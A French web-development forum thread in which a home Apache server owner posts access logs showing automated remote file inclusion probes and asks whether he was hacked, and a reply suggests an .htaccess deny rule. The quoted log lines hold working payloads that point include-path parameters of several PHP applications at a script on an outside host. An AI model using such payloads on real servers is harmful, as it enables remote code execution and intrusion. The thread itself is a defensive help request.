IdentifiantMot de passe
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Serveurs (Apache, IIS,...) Discussion :

Tentative de piratage?


Sujet :

Serveurs (Apache, IIS,...)

Vue hybride

Message précédent Message précédent   Message suivant Message suivant
  1. 22/09/2007, 21h32 #1
    bannik
    bannik est déconnecté
    Membre éclairé Avatar de bannik
    Homme Profil pro
    Consultant informatique
    Inscrit en
    Juillet 2003
    Messages
    191
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 50
    Localisation : Belgique

    Informations professionnelles :
    Activité : Consultant informatique
    Secteur : Service public

    Informations forums :
    Inscription : Juillet 2003
    Messages : 191
    Par défaut Tentative de piratage?
    Bonjour,

    J'ai installé un serveur apache sur ma machine pour usage personnel et pour que des amis puisse y accéder. L'usage est assez rare, surtout de l'exterieur.
    Je me baladait dans mes repertoires et j'ai remarqué des fichiers sessions dans le repertoire prévu pour. j'ai voulu regarder les logs d'acces pour savoir ce qui était demandé et j'ai trouvé ça (j'ai pas tout mis):
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    193.224.128.245 - - [15/Sep/2007:21:09:08 +0200] "GET /send_reminders.php?includedir=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 216
193.224.128.245 - - [15/Sep/2007:21:09:08 +0200] "GET /index.php?page=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 200 1254
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /phplive/help.php?css_path=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 214
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /index.php?page=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 200 1254
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /admin.php?cal_dir=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 207
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /common_include/common.php?commonIncludePath=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 223
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /phpnuke/modules/vWar_Account/includes/functions_common.php?vwar_root2=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 256
193.224.128.245 - - [15/Sep/2007:21:09:09 +0200] "GET /SQuery/lib/armygame.php?libpath=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 221
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /myevent/event.php?myevent_path=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 215
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /admin.php?DFORUM_PATH=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 207
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /kernel/loadkernel.php?installPath=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 219
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 208
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 213
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 218
193.224.128.245 - - [15/Sep/2007:21:09:10 +0200] "GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 227
193.224.128.245 - - [15/Sep/2007:21:09:11 +0200] "GET /dotproject/includes/db_adodb.php?baseDir=http://194.102.210.251/dotproject/includes/.a/a.gif?/ HTTP/1.1" 404 230
    il vas sans dire que 193.224.128.245 n'est pas mon ip, que la plupart des urls demandées nexistent pas.

    J'en conclu que c'est une tentative de hack.
    Le phénoméne s'est reproduit le 20/sep/2007 avec une autre IP et il semblerait qu'il y ait eu un acces au fichier phpmyadmin /libraries/select_lang.lib.php (j'ai modifié le nom du répertoire apres cà)

    Est-il possible que le hacker ai pu accéder a ma machine?

    Comment est-il possible de se protéger de ce genre de scan?

    merci.
    Répondre avec citation Répondre avec citation   0  0
  2. 23/09/2007, 09h59 #2
    loopback
    loopback est déconnecté
    Membre confirmé Avatar de loopback
    Profil pro
    Inscrit en
    Septembre 2006
    Messages
    170
    Détails du profil
    Informations personnelles :
    Localisation : Belgique

    Informations forums :
    Inscription : Septembre 2006
    Messages : 170
    Par défaut
    http://193.224.128.245/

    Tu places son ip dans un deny d'un fichier htaccess

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    Order allow,deny
Deny from 193.224.128.245
    Si tu veux le bloquer sur tous les ports tu fait appel à iptables.
    Répondre avec citation Répondre avec citation   0  0
+ Répondre à la discussion
Cette discussion est résolue.
ActualitésFAQs WebTutoriels WebSources WebLivres WebOutils Web
« Discussion précédente | Discussion suivante »

Discussions similaires

  1. tentative de piratage?
    Par Blo0d4x3 dans le forum Sécurité
    Réponses: 18
    Dernier message: 03/06/2007, 20h00
  2. [Sécurité] Est-ce une tentative de piratage ?
    Par psychoBob dans le forum Langage
    Réponses: 24
    Dernier message: 15/02/2006, 12h49

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo